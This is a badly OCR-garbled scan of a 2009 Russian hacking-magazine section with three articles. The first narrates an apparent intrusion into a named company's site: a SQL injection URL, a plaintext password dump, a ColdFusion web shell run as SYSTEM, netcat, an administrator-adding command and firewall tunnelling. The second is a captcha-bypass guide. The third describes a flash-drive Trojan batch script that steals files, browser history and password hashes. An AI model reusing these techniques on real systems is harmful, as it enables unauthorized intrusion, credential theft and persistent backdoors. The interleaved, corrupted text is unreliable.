ИНЪЕКЦИЯ :~':"'~~:;;;_=-:::1~-:::.;.;:'J:.':!.~~
. .". .,. "".. . .
НАЙДЕНА!
~~~~cO)O(! ~~F·=::.· _t) ••• ~ . .,..,• •~ • •• ""......_ .
разному Но парни из Mlcrosoft, вообще, каким-то невозможно, что вусловиях нашего нереаль сайтразработчиков, а сама CMS, оказалось,
своим, HeaeДO'~ЫM путем идут. Мне, например, ного взлома ну совсем никак не удобно. Можно, носит гордое название Results Dlrect. Зачем в
нравится работать с SQLSeгver. Не надо ни коли конечно. пойти стандартным путем: получать по базе хранить учетные данные, я так и не догнал,
чество колонок подбирать, ни ихтипы - ошибку одной записи, запоминать и яв но исключать из но к Itp они реально подходили. Аучетная запись
на преобразование вызвал, и в ответе вся инфор следующих запросов. Но м не этот метод совсем с и менем ism ws prod code и вовсе на вевала
маЦИ51 из базы, как на блюдечке. Оченьудобноl не В кайф' и автоматизации трудно поддается, радужные мысли, которые. к слову, быстро
Сначала провер51ем возможность вывода. да и длина URL не резиновая - для больших баз подтвердились Корень FТРбылоченьпохожна
накроет нас медным тазом корень самого саЙта. После тестирования доступ
http://'~.ism.ws/ Поэтому мы всех обмане,~ Сортируем вверх и НОCl'и нескол ьких скриптов факт отображения
Applications/Forms/FormDisp1ay.
вниз - получаем приемлемый пеЙджинг. Сервак папок и файлов был окончательноустано[3лен.
cfm?FormID=8464+or+l=(se1ect+@@
пощадим идобавим условия на проверку названий Доступ по FТРоткрывал широчайшие перспек
version%2bchar (56) %2bdb_
полей - пусть они пароли какие-нибудьсодержат ТИ8Ы по залив ке фа йлов на сервер и избавлял от,
name()%2bchar(58)%2bsyste:n_
Нуа для того, чтобы совсем круто было, определим казалось, неминуемых приключений по раскопке
user%2bchar (S8 J %2Ь@@sег\геrпаше}- для начала их количество iпримеры запросов функционала админки и поиска ВОЗМОЖI~остей
смотри во врезкеJ. Воттаквот-их9 Поехали l получения шелла.
Мат 7 2008 21:29:56 Copyright (с) EntltylD, Usегпаmе и Password Думаю, объяснять ся, наконец, на свобод)' из душных объятий
1988-2003 Иiсrоsоft Corporation не надо, что я быстро составил новую сери ю web-приложения. Очевидно, нужен веб-shеll,
S tапdаrd Edi t i оп оп !,~ir.dows NT 5. О запросов и моим глазам предсталиданные юзве который позволит бродить по серверу и выпол
(!3'-li1б 2195: Servic<J Pack 4) :RDCMS рей. Пароли хранились В открытом виде и можно нять команды, Но вот беда - никакихследов
ISM-Core: rms: IS1~SQLOl' to а со1uroш было сло,~я голову кидаться на сайт в поисках РНР или, на худой конец, Регl обнаружено
о f data -суре int.. заветной админки. Я, кстати, когда добрался до не было Азначит, момент истины наступил:
исходников, долго и тупо втыкал, поче,~у нельзя придется программить на СоldFuslOП Очень
Имеем сервер не первой свежести и базу RDCMS было шифровать пароли, если парни-разработ гибкая и простая в освоении среда [по словам
ISM-Core. Внимательно присмотревшись.Я бук чики CMS это предусмотрели [SHA-l, SHA-512, разработчиков). но мне почему-то ни разу не
вально подпрыгнул от радости. аббревиатура CMS МD51 и даже реализовали собственный алгоритм нравится. Так что, ГУГЛI1М на temyWeb-shеll'ов
явно да вала пон>пь, что сайтик не на коленках [iMISJ. Ну даладно, Я залогинился, пошарил по и дико облам ывае,~ся. Все ссылки приводят
сварганен, а целая большая и уважаемая контора сайту и вернулся кда мпу структуры БД - еще же в К одному И тому же невзрачному кусочку кода,
это чудо написала и бабла срубила. Но об этом 8та5лицах были поля с паролями. который только ко,ынды исполнять и y,~eeT. Ну
позже. А сейчас на очереди структура БД. даладно. сейчас подточим и подпишем, нужно
На ЭТОМ этапе мне детище Microsoft нравится ГЛАВАз. лишь матчасть поднять. Некоторое время ушло
уже нетак сильно. Малотого, что разработчики ИЛИ ДОСТУП ОТКРЫТ на нереально крутую разработку, после чего
не удосужилисьсделатьнормальныйпейджинг Следующей привлекла В~lи,~аниетаблица SM_ на свет появились два отпрыска. Первый нас
результатов,так еще и гоw_пumЬегв 2000 сер Sites, содержащая колонкус незамысловатым водитпо дирам и файлы показывает, второй
вере реализовать неуспели. Ждет liасжесткая названием FТРРаsswогd.Какоказалось,таблица нас слушает и делает, что мы при каже м.
эротическая прогулка с использованием топовой содержала 'гакже колонки FTPUserName и Файлы быстро за~IЯЛИ свое законное место. Вско,
конструкции. ТОР - этотакая фишка, которая FТРSегvег. Слив данные из таблицы,я увидел, что ре я понял, что владею правами учетки SYSTEM,
позволяет получить первые несколько записей в качестве серверов использовалисьflQTd.net а это было нереально круто. Останавлиааться на
позапросу. А воте какой записи начинать. указать и ftр2лJле\ По адресу гdлеt как раз и хостится достигнутом было нельзя
ХАКЕР 06/126/09
» 83ЛОМ
.•
"~~,'~.).-с.,,,с~,~~,,!,.а ,~~.!kW;.~ ..- - - - - - - - - - - - - - - - - - - - -
..
<M~""; WI;.-а·".'.".'t.".'_I~'
<.IC[C~<::~!"'~ "'Callc •. H.;.< ......... ".~ ..r .... (cI· - ~ ...~:.r.'cr.b~<~.I..·.. k<I"".·~I~t)
-
<1_ •• ~ •• V~OJ>".'''''1' •• '1 t .... .юn< ~~."4 bLL. _~
'''' ..1;:10О10.1>
I"cot.DIz:mIIl-....:I
~ .
КОРЕНЬFТРОЧЕНЬНАПОМИНАЕТКОРЕНЬСАМОГО ПОЧЕМУ НЕ ШИФРОВАЛИСЬ ПАРОЛИ
САЙТА ОСТАЛОСЬ ЗАГАДКОЙ
послуwнозабросилпеlсаt на FTP. На дедике был запущен пеtсаt в режиме net localgroup Аdrпiпistrасоrs st !add
\mс;
РРТР;
п_t?ugжuнг?
3. SOL Server 2005 Здесь все по стандарту используем row_ еТС9- Ассuпеtiх. Все остальные, в том числе и всюду распиаренный
ПLJmЬег11 Например: selecc fleldl, field2 from (select X5plder, работают крайне медленно и ПРОl1ускаютогромное коли
rШ'1_пumЬег() over (orderbya.fieldl) asr, a.fieldl, чество инъекций Кроме того, любой сканер серьезно напрягает
а. field2 fгош (select fieldl, field2 fгош саЫепате) сайт, выдавая хакера с потрохами.
as а) as ь ~.here r=<offseC>. Зачем же пол ьзоваться ска нера ми, есл и бол ьшую часть ра боты за
4. SQL Server 2000 А вот здесь все жестко у нас есть только тор. нас уже сделали ребята из Google. Предоставляя rибкие праВИi1а
Для пейджинга применим такую хитрость' если нам нужно 'Зыбрать создания запрОСО8, Google позволяет получить структуру сайта на
запись С ыомером offset, мы сначала выберем тор <offse\> записей с основе своего индекса, а уж наличие инъекций быстро проверяется
восходящей сортировкой, а уже из полученного результата выберем вручную Тихо и незаметно. А вот если ничего найти не удалось,
первую запись с нисходящей В результате последняя строка станет можно прибегнуть и к сканеру. Только мы советуем не пользовать
первой и ... дело сделано Только ПОМI,И, дЛЯ получения корректного СЯ платными решениями для ламе ров, а написать собственного
результата сортировать нужно по всем полям в запросе l маленького многопоточного зверька.
возможность рулить серваком. Естественно, выбор пал на ный файл rasphone.pbk на взломанныйхаст. Затем созда·
VNC. Схема внедрения VN С, в целом, достаточно проста Iдля ем командный файл следующегосодержания:
ТightVNC, напримерl:
rasdial connect iоп_паше user раssиогд
1. На сервак заливаются I-Jinvnc. ехе и Wl1l_hooks. route add 0.0.0.0 mask 0.0.0.0
d11. remotehostgateway
СJ1ушивания. батн и к и выпадаем в осадок J Соединения "ам не видать, как сайтов подуправле
4. Осуществляетсяреверс-коннект..
СВОИХУLUей, видимо. фаер блокирует исходящие соединения нием CoLdFusion.
wiпvпс. ехе -соппесt <host>: <port>.
на основе типа протокола В черный список попал и наш GRE
трафик
у нас почти все схвачено, кроме одной маленькойдетали. а Отчаяние все сильнее проникало в наши души, но мы не
именно - наличия доступа к рабочему столу. Надежда уми сдались. По правде, тупили мы очень долго, таккак надо было
рала, едва успев родиться, тек как шелл у нас был справами сразу обращаться за помощью к 55Н Это. кстати, очень мощ
учетной записи 5У5ТЕМ. Не были бы мы хакерами, если Hый зверь, о чем не раз писалось в::х:. Не только шелл можно
бы не попробовали, но, каки ожидал ось, все попытки шли получ ить, НО И много других хитрых вещей придумать. Наша
лесом. Был даже испробован Metaspl.oit cwindows/vncinject/ последняя надежда заключалась F! успешной реализации
reverse_tcp нагрузкой Iжуткотормозная вещьi, но и Великий всеготрех шагов:
доступа к рабочему столу остался неведом На самом деле, я залить на узел SSН-кпиент можешь воспользо
даже обрадовался -зачем HaMVNC, если есть RDP. Надо толь подкш,читься и создать нужный маппинг портов ваться следующими
Гениальная мысль с РРТР заключается в создании я многое могу пон!пь. но, например, поче~у в Винде в • асuпеtiх.СОГП/
РРТР-соединения до нашего дедика - и в дальнейшем XXI веке до си х пор нет встрое н н О го 55 Н-сер вера, м н е \/u lnec.a_b.ili1.y.-scan пег/
обращении к узлу по внутренней адресации с туннели· неведомо. Ну да ладно, ставим любой, благо их довольно - Ассuпеtiх WеЬ
рованием трафика сквозь фаер. В Винде все соединения много. В качестве клиента, естественно. используется vuLпегаыltуy 5саппег.
настраиваютс\\ графически, но должен быть способ работы любимый putty. Нотолько putty не простой, а волшебный. • ptsecurity,l'u/xs 7.asp
из консоли. Запускаем на тестовой машине ргосгпоп от Если помнишь, при обращении к новому узлу рuttучестно - Xspider.
Руссиновича и мониторим реестр в момент вызова клиента предлагаетсохранитьсигнатуру в кзше. Доступ К команд • cirt,net/nikt.02
подключения к сети. Результат не поддается разумному ной строке у нас Иlперактивностьюне отличается, и ничего Nikto.
обьяснению, - ничего интересного с реестром не проис· мы ответить на ЭТОТ вопрос попросту не сможем. Значит, • ;;еПlliоs t .СОГП/
ходит. MicrosoFt сама себя превзошла. Стоило создавать надо, чтобы отпечаток сохранялся автоматически,а putty research/v,ikto
реестр, если собственные же модули им не пользуются, этого не умеет. Немного погуглие, мы нашли Quest РиТТУ Wikto.
Пусть подумают на досуге, а мы, тем временем, нашли О.60_цl.129. Все то же самое, плюс то, что нам нужно'
«телефонную кни гу» ПО адресу С:\Оосuгпепts апd 5etti пgs\ Заливаем plink.exe на cep~aK и исполняем команду:
Sessions overview
The following sessions ауе currently active оп WinS5HD. Click[+] to expand а sessitln and see the 5SH channeJs it is using.
Sessions: 1 Blocked IPs: О View bIocked IPs...
I Remote Ip Remote port Connect time Client version Account type
Id
в 1001 204.153.45.116 1318 00:07:32 5SH-2.0·РuТРо'_... \/·ШJDО\oIJS
:.. ,. Open time: 00:07:N, Туре: forwarded-tcpip, Буtеs received: 2 760148, Bytes sent: 21 202
:.... Open tIme: 00:07:29, Туре: direcHcpip) Буtеs received: О, Буtеs sent: 287
~O--"' __ , , " _ ~ .
•
:1)(о.о,с . с' Х .... ,tj,,,-,,"--'-J~~_,'-f-"';OIIfLoOO: ~ !d _
• _ _• __
<form action=" ht ер: / /www. ism. ,vs/about/
*"' ~ I'#lk.. • • ;""1..,.. 0 - ' _ _.,.,..
Q_·t.CooO_·~CI~·C;_· .>_-0_." 4_'. Q.._·::--/... ·0-....... · t1еdiаRООШ/RеqllеstГоrm.
cfm» method=" POST" >
Tne web slte you 3ГЕ! acces::sing has expenenr..ed аn unю;~~ttЮ e:rror.
<table>
PIe8:S'e; contact Фе website adminlstтator.
. , , "'. < tr><td>IP-адрес уэла для туннелироаания: </
E/I"OI~е-::.~'N·~r-:-.~'":Y,IР"4>О:;t
td><td><input type="text" size="20" name="ip"
~ info "al ие= "mOrOsuperdedik. сош'»</ input></ td></t:r>
Получение инфы из <tr><td>Порт SSH:</td><td><input type="text"
БД вручную -утоми size="20" паmе="роrt." vаluе="22"></iпрut></
На первый взгляд. все за мечательно. но каждый раз заходить IMIS [длина 120 бит] Возиться былоуже неохота. так что мы
на web-shel! и запускать команду на подкл ючен ие по SSH решили оставить это тебе. Ну а чтобы был стимул, вбей в Google
на следующий день стало спишком утомительным Поэтому Iпuгl'паvltеmNumЬег - 12000 записей будут манить тебя и
наикрутейший Со(dFUSlOп-шелл был немного ,;одифицирован ВДОХНО8лятьна подвиги. Доводи любое дело до конца,
для исполнения команды подключения без участия человека. каким бы нереальным это ни казалось. иначе любое твое.
Код модификации шелла смотри на нашем DVD. начинание лишено смысла. Все описанные действия
Кусок кода был заныкан в файл hеаdег.сfm. который, в свою совершены под музыку Брамса \спасибо «_xCort_" с
очередь, подключается кбольшинствуфаЙЛ08 CMS. Далее tОГГ'епts rul. Перефразируя слова бессменного ведущего
создаем простую форму. указы вающую на любой * сfm-файл программы «Дым под водой» Кирилла Немоляева' «Слу
на серваке. и получае,; простой способ организации RDP. шайте классику и будьте счастливы!».:Х:
, Or<1ng e
партнеры акции
С Fitness
.
~////л
х S4AVROOW
1 S4AVRDOW@POC.RU 1
О СМОТРИМ
ВЗЛОМ САРТСНА-ФИЛЬТРОВ
зированный публичный тест Т ьюринга для оп В наиболее распространенномварианте сарtсhа-фильтров. К уязвимостям реализации
ределения компьютеров и людей, В основном испол ьзова н и я са ptcha- фильтров требуется относятся следующие распространенные
используется, когда необходимо предотвратить ввести символы, как правило, изображен проблемы
выполнение каких-либо автоматизированных ные на предлагаемом рисунке в искаженном I,А8томатизированноераспознавание.Ав
действий в отнашении инт~рнет-сервисов, виде и обычно - сдобавлением некоторого томатизированное распознавание капчи или
8 частности, для предотвращения автомати «шума». Могут также применяться другие задача OCR (оптическое распознавание сим
ческих отправок сообщ~ний, регистраций, ПЛОХО алгоритмизуемые задачи, основанные воловl- зто одна из самых острых проблем
проведения атак типа подбор пароля и т.п. на логике мышления человека, например: применения captcha-фИЛЬТР08.Дело втом,
Понятие Теста Тыоринга было введено Аланом указать, что изображено на картинке; ввести что во многих случаях существуетвозмож
М. Т ьюрингом [1912-19541 в работе "Игра в все символы, которые соприкасаются с чем-то ность автоматизированного распозна взния
имитацию». Задача та кого теста - опреде (вспоминай кошек на rapldsharel и пр. Как текста, нанесенного на изображение. Тотже
лить, обладает ли компьютерная программа альтернативз картинкам могут применяться Adobe Fine Rеаdегс успехом может распоз
интеллектаl'" или, точнее, может ли она вы капчи, основанные на распознаванииречи. на8ать слабые реализации captcha [смотри
давать себя за человека. Критерий Тыоринга Встречаютсятакже капчи, где предлагается скриншотыl. Различного рода искажения с
описан в виде игры "Имитация». Берется ввести ответ на простое арифметическое добавлением шумов на изображение способ
один мужчина. одна женщина и программа, деikтвие (90 + 72 = ?I. ны лишь с некоторым лроцентом успешности
которая, не Иf~ея информации о половой при воспрепятствовать этому. Ведь чем более ис
Н'адлежности участн иков, задает им вопросы. ПРАКТИКА ОБХОДА кажена информация на изображении дЛЯ 8ВО
Ее цель - определить ПОЛ людей. Несмотря CApteHA-ФИЛЫРО8 да, тем больше проблем возникает у конечного
на критику этой теории, она внесла большой Сегодня ИЗ8естно достаточно много способов пользователя. Разработчикам фильтров при
вклад в развитие систем искусственного обхода различного рода сарtсhа-фильтров ходится находить некий компромисс между
перебору паролей к аккаунтам исследуемой Или более простой случай - если ДЛА картинок
системы .. если бы не одно «НО». Ограничения I-ie используются раЗЛИЧI-iОГО рода искажения
макси проекта САРТСНА Killer не позволяют рас и добавление шума Тогда просто сверяются
мальным ПОЗl-iавать более 20 изображений в сутки при контрольные суммы, и становится поНятно, с
Иl-iформации и Ключевое слово тут - «одного». На сайте про 3. Уязвимости при передаче значения капчи
теля прочитать и ввести значеl-iие за ровать неограl-iиченное количество пользова ется соответствие междузначением капчи и
приемлемое количество попыток. телей. При всем уважении к проекту (на сайте генерируемой картинкой? Многие разработчики
На фоне подобного l-iеАОСтатка появилось даже было замечено использование защиты сарtсhа-фильтров почему-то полагают, что
несколько проектов по практическойде от CSRF) авторы не стали заморачиваться по вместо некоторого Bl-iутреннего идентификатора
монстрациизадач OCR. Наиболее извес поводу разработки стойкой капчи, а просто лучше передавать в браузер пользователя эави
тные ю них - это UC Berkeley Computer просят при регистрации нового пользователя симоезначение от генерируемой капчи (хеш от
Visiоп Group, PWNtcha и САРТСНА Klller. сложить два числа, которые попадают в сырой генери руемого значен ияl. И впоследствии осу
Ваш ПОКОРI-iЫЙ слуга, выполняя пентест HTML-KOA. ДЛЯ ,юик целей достаточно было ществлять проверку по зтому значению. Приче'1,
OAI-iОГО банковскогоwеЬ-приложения, имел лишь самого вектора, ноты '10жешь восполь порой передача осуществляется G виде откры
ВОЗМОЖI-iОСТЬ познакомиться с последним зоваться этим недостатком, пра вда, думаю, того текста [то есть Зl-iачение капчи передается,
более близко.
баг довольно быстро прикроют например, какзначение скрытого параметра
Sfie1.ds = array ( 'api_key' => Но и этого более чем достаточно, например, для
$api_key, 'met1106, => 'get_ автоматической регистрации новых ящиков
resuJ.t', 'captcha_id' => $captcha_ злектронной ПОЧТЫ.Аесли учесть, что работать тУ $key = int (rand 10000);
id) ; '10ЖНО в несколько потоков ... Другое дело, что шу @БуrnЬо1. s = (, О ' , , ' 9 ' ) ;
$геsропsе = ht ::p_parse_ при такой скорости особо не побрутфорсишь, for ( 1.,,5 ) (
message (rlt tp_pos t_fieJ.ds ( "ht tp: / / но, как говорится, I-ie все же коту масленица $ч . = $symbo1.s [raod @symboJ.sl;
WW"'. captcnaki 1.1. er. сот/ dPl • p11p" , 2.0граниченное количество вариантов изоб
$fie1.ds, $files) )->body; ражений. Самый яркий пример - это капчи с ту $hasll sha1._hex { uc ($ч), $key
изображениями различной ЖиВI-iОСТИ Недо ) ;
фективность - порядка 80% генерируемых животных, птиц и прочих существ ограниче Что тут не так? Ограниченный l-ia60p сим
изображений было распознано безупреч НО,а это позволяетсформироватьбаэу всех волов пр" генерации капчи, слабая «соль»
но. Ограниченный набор генерируе'1ЫХ на возможных вариаци й ка РТИI-iОК. [salt] и. как следствие - небольшая энтропия
изображекияхсимволов[использование Эксплуатируется вектор достаточно прос возможныхзначениЙхеша.Ахеш, всвою
только верхнего регистраl позвол"л повысить то Сначала собираются картинки со всеми очередь. передается в 6раузер пользователя.
зффективность вектора атаки еще на 10%. доступными изображениями животных. И в Все это позволяет сформировать заранее
На анализ одного изображения тратил ось зависимости от реализации системы, атака cra подготовленные табл ицы соответствия хеша
FLAG CA"•• S
( ! ! Н:О 11111 [ rr н;: 11 tI t I J J
ПРИМЕРЫ САРТСНА, коТОРЫЕ БЫЛИ РАСПОЗНАНЫ
СОТРУДНИКАМИ ИНПИТУТАБЕРКЛИ
ложения [например. cookiesJ И когда при капчи и его идентификатора - и становит щеетвляетбесконеЧI'lыеобращени~ к модулю
ложением не осуществл~етс~ мониторинг ся возможным бесп реп~тственно обходить генератора капч и. а второй - осуществляет
действий авторизованного пользователя. сарtсhа-фильтр Во втором случае проблема перебор по постоянно'~у диапазону значений
бот сможет беспреп~тетвенно выполнять возникает. когда допускаетс~ долгосрочное [вспоминай теорию вероятности и поймешь.
свои фУf;КЦИИ. хранение сгенерированных, но никем I.,e почему надо использоВать «постоянный"
Повторное использование значения капчи испол ьзованных значений сарtсhа-фильтра, диапазон значений). в ситуации. когда набор
встречается в двух случаях. В первом - не и при этом отсутствует какая-либо привязка К символов при генерации значения капчи
производится очистка использованных идентифи катору капчи при проверке его зна ограничен [используются, например, только
значений капчи. введен ных пол ьзовател~ми. чения, ЭТО поз.волястпроводить вектор аlаки цифрыl. вектор атаки может быть достаточно
Достаточно получить одно верное значение типа брутфорс. Например. один поток осу эффективным!
• Оптическое распоз
навание с!'!мволов
острых п робл е м
пр!'!менения captcha
фильтров.
• С использованием
web-приложение. Если приложение содержит уязви обычно стаНОВИТСR бесплатный порно-сайт, на котором эффе кти В Н ость са
мость, позволяющую при эксппуатации дотянуться до пользователю предпагается ввести значение капчи в мого ИСПОЛЬЗ0ваНИR
хранимых значений captcha, задача по оБХОАУ ее BBOA<J обмен на просмотр желаемого ропика, Кроме порно-ресур са ptcha -фильтров.
будет СВОДИТЬСЯ к простой выборке нужных значений из сов, Аля реализаци!'! ПОАобных целей замечательноПОАОЙ
соответствующей таблицы БД Например, это реалиэуе дет крупная СОЦ!'!альнаясеть. Однако до сих пор социаль
~,o ПРИ эксплуатации уязвимости типа SOL InjectlOn. На ные сети используются искпючительнодля распознавания
практике мне встречались подобные приложения, В капчи в благих целях Это проектRеСАРТСНА,признанный
свое время даже был забавный случай, когда обследуе помочь в оц!'!фровкетрудно распознавае,щготекста книг
мое web-приложениесодержало вроде бы безобИАНУЮ Проект запущен в таких социальныхсетях, как Facebook.
уязви~,ость типа пистинг Аиректорий В пространстве Bash.org ru и АР
корневой АИ ре пори и we Ь-сервера распола гап!'!с Ь
генерируемые VrЭображения капчи, а в V·MeHax файлов ВМЕСТО ЗАКЛЮЧЕНИЯ • ~a cSJ.· <-щ,..lli:9L'юh1L
СОАержал!'!сь!'!х значенv,я. Безусловно, Э1'О единичный Надежностьлюбойсистемы безопасности в значительной РWNt<jш
случай, но с учетом повсеместных уязвимостей типа степени зависит от качества ее реализации. У практи • captchakiller.com
SOL IПJесtiоп данный вектор более чем применим Аля ческ!'!х решений есть свои недостатки. которые могут • !2.~с_u.гitуlаЬ.г_ш'
обхода ВВОАа капчи Другое дело, будет ли зто 80стре быть использованы злоумышленниками В полной мере соп test!239642,phQ.
бованным в случае, когда приложен!'!е содержит такие это правило применимо и к системам, использующим
фильтров ОТНОСИТСЯ воэможность использоваНИА челове быть недостаточно. Хорошей практ!'!кой является в до·
ческого ресурса для распознавания капчи ["меТОАлем полнение к капче использовать!'! Аругие механизмы, за
мингов"j. Это замечательный!'!очень эффективный вектор трудняющие автоматизи рованн ые Аействия, На пример,
обхода сарtсl1а-фильтров, которым с момента широкого могут испольэоваться различные временные задержки
~ 058
Езлоt·.-1
Однажды вечером я сидел дома. почитывая КiпgSlоп, в задачи которого входила nepe диска, пустой перегородк., между дисками
за кружкой кофе очередной номер журнала прошивка моей флешки дл~ совместимости и пустой рабочей части Как прин~то в ком
"хакер", и вдруг наткнулс~ на статью про С Vlsta И именно с его изучеНИR началось пании Кlngstоп. все должно быть доступно
попытки взлома U3-флешки и софта под нее. самое интересное дл~ взлома, а это значило, что уже через
CTaTb~ меня сильно заинтересовала тем, что 1О минут ковыряния в блокноте я создал
флешка была не npocTaR. а буквально золо ПОДАРОК ХАКЕРУ корректный файл автозапуска для защищен
тая. И простор для хакерской деятельности ПАТЧ ОТ РАЗРАБОТЧИКА ного диска. Он наnравл~л выполнение кода
на ней просто безграничен. Уже через день ~ Итак, у нас есть неизвестное приложение. сначала на мой обработчик, а затем уже на
приступил к опытам и изучению этого инте При запуске оно опрашивает носитель, файлы LаLJПсhU3-0бработчика итакдалее.
ресне~шего оборудования. Как оказалось. в копирует данные с него к нам в комп. а после Теперь пора поговорить 05 обработчике и
caHO~ системе таких флешек существовала перепрошивки возвращает все по местам. исполняемом коде, определить концеп
уязвимость, которая потенциально позволя Сопровождается этот праздник жизни ции развития и общую структуру постро
ла взломщику сделать инъект в содержимое всевоз~r.ожными глюками и красивыми ени~ В качестве языка для написания
защище~IНОГО раздела флешки и заставить окошками, которые просто инезатейливо систе~~ы я выбрал командную строку
это содержимое ИСПОЛНЯТЬСR на ко;r.пьютере информируют юзера, что ему следует делать WlпЗ2 Сделал я это по целому p~дy при
жертвы. К слову сказать, Большо~ Браттоже дальше. Пристальное внимание Я обратил чин, в числе которых - npocToTa изуче
не спит, поэтому все флешки такого типа на сам исполн~емый файл. Он заставил ния этого языка и легковесность готовых
перестали попадать к нам на прилавки уже меня улыбнуться. ЭТО незащищенное исполняемых Ьаt-файлов_
через 2 недели Сейчас их нет ни в одном Wlnгаг-приложение, имеющее тип саморас
магазине города. Но заказатьтако~ U3-шный паковывающегося архива, в котором было НЕПРИСТОЙ~НЫЕ ЗАПРОСЫ
флеш-диск на /" гига в инете нет никаких необычное содержимое. Весь взлом состоял КОМАНДНОИ СТРОКИ
nроблемi в распакоаке и правке нужных Iпi-файлов Прежде чем мы полезем вдебри, давай расоr.отрим
ПОРЫ8ШИСЬ в Сети, я не нашел никаких блокнотом Чем дальше ~ изучал их систему основные приколы командного языка и методы об
постов по этой теме и начал сам ковырять обновлений, тем больше мне зто напоми хода тех или иных ограничений. Первая проблема,
флешку, а именно - пробовал ее скопиро нало приколы из серии «почувствуй себя которая долгосотрясала мой мозг - это обращение
вать, разбить, переформатировать, юменить кул-хакером". В архиве лежали интерфейс к русско~зычным ПУТRМ В проводнике из пакетного
загрузочную область ... В итоге, все мои обновл~лки,функционал.которыЙполучал файла. Если, допустим, с консоли ввести
попытки были обречены на провал, пока доступ кзащищенномудиску и isо-обра
мне в руки не попал замечательный nатч от зы - соответственно, для защищенного
какую-то кракозябру на неизвестном языке Но все будет ненные в кириллическихсимволах Они всенепременно
прекрасно работать, еслиты пропишешь кодировку 1251 исказятся в какую-то вну'Греннюю кодировку комаНДIЮЙ
флешки. Есть экземп Л>JХ допустим,ты работаешь с окном командной строки, и тебе строки вроде скобок. Но даже в этом случае ты можешь
ляры на 1,2,4 и вроде надо получитьчисло из ответа Ko,~aHДЫ. Попробуем написать использоватьсинтаКОIС циклов FOR, которым наплевать
быдаже на 16 гиговl программу,ко'Горая мониторитсвязьскомпьютеромпо сети и в на содержи,~ое их переменных, или просто скопирова'Гь
р17.shtглl, проиаво rem # укажите сервер лишь упомянуть о возможности запуска скриптов как в
дился интересный @эес саrgеt=194.67.57.2б режиме ожидания окончания предыдущего, так и в мно
chcp 866
алгоритмам Нет проблем и с математикой, матрица"tи
:т1 и прочими полеаными вкусностями. Даже базу данных
состряпать в ней можно без труда, хотя не без I-еморроя.
@set рг=уаr,п=l,б
Всегда К твоим услугам справка Windows по KOMaHiJHov,
@for /F' "usebackq Cokens=l. 2. З, 4,5.6,7*
строке и моя почта. )'1 будутолько рад вопросам, потому
delims= " %%1 IN ('ping %Carget% -п 1')
что хочу расширить доступный мне функционал коман
DO (echo %%4 %%5 %%6Ifiпdstг 'уа(,п=»&&@
д~ой строки ее же средствами. Считаю использование
set рr=%%б) & (echo %%1 %%2 %%3 %%4 %%5
этого языка хорошим подспорьем для затруднения
pr=disconected)
целом В свое время я писал большой проект. на который
неоднократно покушались другие программисты, но все
Изначально система писалась под WindowsXP Ноте, манных машин прямо на мой рабоч>\й стол! Допустим, что
~ warning
но после ее тест>\рования на WiпdоwsХР Рго выяв>\лись флешка попала влапы негодяя Предлагаю расо,отреть
некоторые глюки Напр>\мер, система долго и исправно лишь некоторые моменты файла "WARBOTbat», напр>\ Вни~,ан>\е! Инфор
работала на всех компах, пока со мной и "'10>\"'1 товарищем мер, его начальные настройки: мацVlЯ представлена
днем нам вы пала возможн ость попасть в другой корпус set make_tir_in_allusers_autorun=l - созда
ознакомления/Ни
POAHOI'O университета и получить доступ к компьютеру, вать ли Трояна в а.втозагрузке всех пользова
автор, н и редакц",яза
через который так или иначе проходят все методички, телей (0\1)
твои действияответе
бы неплохо навар>\ться. Пр>\дя в корпус, Я передал при ли Трояна в автозагрузке текущего лользо:вате
меня. как сейчас помню, He~'HOГO озадачила надпись set stealth_konsol=O - копировать ли с КОМ
Windows2000 на з кране мон итора, но уже через м гнове пьютера жеР'ЕВЫ файлы консопей управления?
гнезде USB, Флешка не захотела атаковать компьютер, set stealth_histiry_ie=l - копировать ли ис
>\ Р.. недолго ду~,ая, 8руб>\л принуд>\тельную атаку, Время ,"орию посещения 6раузера ТЕ? (0\1)
шло, флешка работала, а мы выполняли собственно то, set attack_for_guest=l - производить ли атаку
О да I Флешка сработала чудесно! По сещ МЫ прон>\кли в недавно ОТКрЫТЫХ документов? {иногда ПОНQга
а также все необхо
одну из самых защищенных ~ышин и с кайфом БГлядыва ет «осмотреться») (0\1)
димые материалы,
отдела. И так продолжалось до самого обрыва связи. «Ну, лаги со счетчиков системы и значения перемен
аспектов разработки
ничего - завтра все скоп>\руем», - сказал Я товарищу, >\ ных? (0\1)
подобныхприложе
мы пошли подомам. На следующееутро моего друга под set steal th_md5--I>asswords=1 - nЫ'Т'аться ли
НИЙ,скриптован>\я
няли по тревоге - надо было срочно явиться в l'ОТ отдел, скопировать мд5-хеши паролей с системы? (О \1)
под WiпЗ2 и прочие
чтобы подправ>\ть какие-то поля. ПОЧуЯ8 неладное. мы set type_of_file_for_stealth=.doc . txt
вкусности.описанные
подключились к вузовской сети и стали пытаться зайти на указывает файлы, которые ДОЛЖНЫ быть сграбле в статье Тебе остается
тот компьютер НаС>Кдал облом - компьютер п>\нговался. ны с компьютера на флешку лишь взять и УЛОЖVlть
корпус .lnp3 .WПlа .уоЬ .wav .mid .midi .тр4 . avi .ogg териал по папочкам.
Придя, ~Ш наблюдали следующую картину. компьютер, .mpeg .mpg .cda %usbdisc% winword WINWORD
возле него несколько человек. Они смотрел>\ на нас
.&.
глазами маньяков. которые давно никого неубивали. На
Е: HOMi?p!
8се последующие 80ПрОСЫ мы сделали лица кирп>\чом и
(
местного сисад~,ина, который добрых три часа возился с
таблич~ой ввода пароля, и. видимо, совсем отчаявш",сь,
но по купать дорогую UЗ-флешку - сойдет даже трЗ
плеерl Универсальный софт для ~ЮДVlфикации флешек,
наугад ввел ",мя пользователя "Гость» И нажал «Enter» загруженный с сайта liltp:l/flashhoot.ru/irrdex.php?nam
Система неожиданнопорадовала его не тол ько успеш e~Files&op=cat&id=6&раgепum=2,я заботливозалил
ным входом, но >\ админск",ми полномочиями в пр",дачу. на диск. Как его юзать - разберешься в рамках моего
Вонакие пирог>\. домашнего задания ;1. Или п",ши на почту - помогу.
е; EKplorc drive 1:
8 Settings»
~ ЕпаЫе Security
I a::rngston U3 (enter
,..-~ ------,
\ ~ Dow.1load Pragrams )
-----.".,==с"
..
Uз:'ШНОЕ МЕНЮ МОЕГОДЕВАЙСД
КО иЗ установки радмина ?
Cookies cookies .jpeg .jpg .Ьmр .gif .pic .pict .ico гас'Т'Я
rem #.jpeg .jpg .Ьmр .gif .pic .pict . ico .gif .html пеt. localgroup аДViинистраторы гость /адб - сделаем гос
.htm - другой набор фильтров под другие задачи тн равным администратору по правам
set find_evristic_analyze~in_file_folders=l
